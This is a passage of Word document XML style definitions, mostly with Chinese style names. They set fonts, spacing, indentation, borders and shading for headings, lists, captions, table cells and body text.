      <w:suppressAutoHyphens/>
      <w:spacing w:before="240" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="文鼎PL细上海宋Uni" w:eastAsia="文鼎PL细上海宋Uni" w:hAnsi="文鼎PL细上海宋Uni" w:cs="文鼎PL细上海宋Uni"/>
      <w:kern w:val="1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="afd">
    <w:name w:val="List"/>
    <w:basedOn w:val="af8"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="720"/>
      </w:tabs>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="0" w:after="0"/>
      <w:ind w:firstLine="425"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:spacing w:val="-5"/>
      <w:kern w:val="1"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Index">
    <w:name w:val="Index"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:suppressLineNumbers/>
      <w:suppressAutoHyphens/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="1"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Caption1">
    <w:name w:val="Caption1"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:suppressLineNumbers/>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="120" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:kern w:val="1"/>
      <w:sz w:val="24"/>
      <w:lang w:eastAsia="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f8"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="0" w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Times New Roman"/>
      <w:kern w:val="1"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="21"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="19">
    <w:name w:val="文档结构图1"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="000080"/>
      <w:suppressAutoHyphens/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="1"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CharCharCharCharCharCharCharCharCharCharCharChar">
    <w:name w:val="Char Char Char Char Char Char Char Char Char Char Char Char"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:widowControl/>
      <w:suppressAutoHyphens/>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
      <w:kern w:val="1"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="21"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Author">
    <w:name w:val="Author"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:widowControl/>
      <w:suppressAutoHyphens/>
      <w:spacing w:after="120"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
      <w:kern w:val="1"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="21"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CT">
    <w:name w:val="CT"/>
    <w:basedOn w:val="2"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:keepLines w:val="0"/>
      <w:widowControl/>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="576"/>
      </w:tabs>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="576" w:hanging="576"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:i/>
      <w:color w:val="FFFFFF"/>
      <w:spacing w:val="44"/>
      <w:kern w:val="1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="de-DE" w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1a">
    <w:name w:val="批注文字1"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="1"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1b">
    <w:name w:val="批注框文本1"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="1"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="42">
    <w:name w:val="样式 标题 4 + 四号"/>
    <w:basedOn w:val="4"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:line="372" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="宋体"/>
      <w:kern w:val="1"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="6TimesNewRoman">
    <w:name w:val="样式 标题 6 + (西文) Times New Roman (中文) 宋体"/>
    <w:basedOn w:val="6"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:line="314" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:kern w:val="1"/>
      <w:sz w:val="21"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1c">
    <w:name w:val="样式 标题 1 +"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="af8"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:line="480" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="1"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CharCharCharCharCharCharCharCharCharCharCharCharCharCharCharChar">
    <w:name w:val="Char Char Char Char Char Char Char Char Char Char Char Char Char Char Char Char"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:widowControl/>
      <w:suppressAutoHyphens/>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
      <w:kern w:val="1"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="21"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1d">
    <w:name w:val="题注1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial" w:cs="Arial"/>
      <w:kern w:val="1"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1e">
    <w:name w:val="批注主题1"/>
    <w:basedOn w:val="1a"/>
    <w:next w:val="1a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="24">
    <w:name w:val="正文缩进2"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:ind w:firstLine="420"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="1"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="afe">
    <w:name w:val="段前段后"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:line="0" w:lineRule="atLeast"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="1"/>
      <w:sz w:val="10"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1f">
    <w:name w:val="普通(网站)1"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:widowControl/>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="280" w:after="280"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
      <w:kern w:val="1"/>
      <w:sz w:val="24"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aff">
    <w:name w:val="Body Text Indent"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Charc"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="62" w:after="31" w:line="264" w:lineRule="auto"/>
      <w:ind w:firstLine="420"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="1"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Charc">
    <w:name w:val="正文文本缩进 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="aff"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="1"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="aff0">
    <w:name w:val="我的列表"/>
    <w:basedOn w:val="24"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="840"/>
      </w:tabs>
      <w:ind w:left="840" w:hanging="315"/>
    </w:pPr>
    <w:rPr>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1f0">
    <w:name w:val="样式1"/>
    <w:basedOn w:val="5"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="2100"/>
      </w:tabs>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="2100" w:hanging="420"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="楷体_GB2312"/>
      <w:bCs w:val="0"/>
      <w:kern w:val="1"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aff1">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="af8"/>
    <w:link w:val="Chard"/>
    <w:qFormat/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="240" w:after="60" w:line="312" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:kern w:val="1"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Chard">
    <w:name w:val="副标题 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="aff1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:b/>
      <w:kern w:val="1"/>
      <w:sz w:val="32"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="25">
    <w:name w:val="样式2"/>
    <w:basedOn w:val="aff1"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="425"/>
      </w:tabs>
      <w:spacing w:before="60" w:line="360" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1f1">
    <w:name w:val="测试 1"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:autoSpaceDE w:val="0"/>
      <w:spacing w:line="300" w:lineRule="auto"/>
      <w:ind w:firstLine="425"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000000"/>
      <w:kern w:val="1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="aff2">
    <w:name w:val="测试过程"/>
    <w:basedOn w:val="24"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:autoSpaceDE w:val="0"/>
      <w:spacing w:before="60" w:line="300" w:lineRule="auto"/>
      <w:ind w:firstLine="360"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000000"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="paragraph">
    <w:name w:val="paragraph"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:widowControl/>
      <w:suppressAutoHyphens/>
      <w:autoSpaceDE w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:kern w:val="1"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="aff3">
    <w:name w:val="插图"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:widowControl/>
      <w:suppressAutoHyphens/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="1"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="aff4">
    <w:name w:val="插表"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:widowControl/>
      <w:suppressAutoHyphens/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
      <w:kern w:val="1"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1f2">
    <w:name w:val="列表项目符号1"/>
    <w:basedOn w:val="afd"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:ind w:firstLine="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="510">
    <w:name w:val="列表项目符号 51"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:widowControl/>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
      </w:pBdr>
      <w:suppressAutoHyphens/>
      <w:spacing w:line="320" w:lineRule="exact"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond"/>
      <w:kern w:val="1"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="33">
    <w:name w:val="样式3"/>
    <w:basedOn w:val="24"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="780"/>
      </w:tabs>
      <w:ind w:left="-420" w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1f3">
    <w:name w:val="列表编号1"/>
    <w:basedOn w:val="afd"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="420"/>
      </w:tabs>
      <w:spacing w:after="240" w:line="240" w:lineRule="atLeast"/>
      <w:ind w:right="720" w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
      <w:spacing w:val="0"/>
      <w:lang w:eastAsia="he-IL" w:bidi="he-IL"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="aff5">
    <w:name w:val="项目符号"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="24"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="156" w:after="156" w:line="0" w:lineRule="atLeast"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="1"/>
      <w:shd w:val="clear" w:color="auto" w:fill="D8D8D8"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="xl24">
    <w:name w:val="xl24"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:widowControl/>
      <w:pBdr>
        <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
        <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
        <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="0000FF"/>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="280" w:after="280"/>
      <w:jc w:val="center"/>
      <w:textAlignment w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FFFFFF"/>
      <w:kern w:val="1"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="xl25">
    <w:name w:val="xl25"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:widowControl/>
      <w:pBdr>
        <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
        <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
        <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="280" w:after="280"/>
      <w:jc w:val="center"/>
      <w:textAlignment w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
      <w:kern w:val="1"/>
      <w:sz w:val="14"/>
      <w:szCs w:val="14"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Text">
    <w:name w:val="Text"/>
    <w:basedOn w:val="Caption1"/>
    <w:rsid w:val="00895A44"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="WW-Text">
    <w:name w:val="WW-Text"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="60" w:after="60" w:line="260" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Label">
    <w:name w:val="Label"/>
    <w:basedOn w:val="WW-Text"/>
    <w:next w:val="WW-Text"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="210">
    <w:name w:val="正文文本缩进 21"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:ind w:left="420"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="1"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="075">
    <w:name w:val="样式 宋体 首行缩进:  0.75 厘米"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:line="300" w:lineRule="auto"/>
      <w:ind w:firstLine="425"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
      <w:kern w:val="1"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="310">
    <w:name w:val="正文文本缩进 31"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:widowControl/>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="280" w:after="280"/>
      <w:ind w:firstLine="420"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
      <w:kern w:val="1"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="074">
    <w:name w:val="样式 首行缩进:  0.74 厘米"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:line="300" w:lineRule="auto"/>
      <w:ind w:firstLine="420"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="1"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="DocStatistic">
    <w:name w:val="DocStatistic"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:widowControl/>
      <w:suppressAutoHyphens/>
      <w:spacing w:after="200"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
      <w:kern w:val="1"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="21"/>
      <w:lang w:eastAsia="ar-SA"/>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f8"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="0" w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Times New Roman"/>
      <w:kern w:val="1"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="21"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="43">
    <w:name w:val="样式4"/>
    <w:basedOn w:val="5"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1080"/>
      </w:tabs>
      <w:suppressAutoHyphens/>
      <w:spacing w:line="372" w:lineRule="auto"/>
      <w:ind w:left="1080" w:hanging="1080"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
      <w:kern w:val="1"/>
      <w:sz w:val="21"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Framecontents">
    <w:name w:val="Frame contents"/>
    <w:basedOn w:val="af8"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="0" w:after="120"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="1"/>
      <w:sz w:val="21"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableContents">
    <w:name w:val="Table Contents"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:suppressLineNumbers/>
      <w:suppressAutoHyphens/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="1"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableHeading">
    <w:name w:val="Table Heading"/>
    <w:basedOn w:val="TableContents"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Contents10">
    <w:name w:val="Contents 10"/>
    <w:basedOn w:val="Index"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9637"/>
      </w:tabs>
      <w:ind w:left="2547"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="26">
    <w:name w:val="文档结构图2"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00895A44"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="000080"/>
      <w:suppressAutoHyphens/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="1"/>
      <w:lang w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aff6">
    <w:name w:val="Plain Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Chare"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00C55A9C"/>
    <w:pPr>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
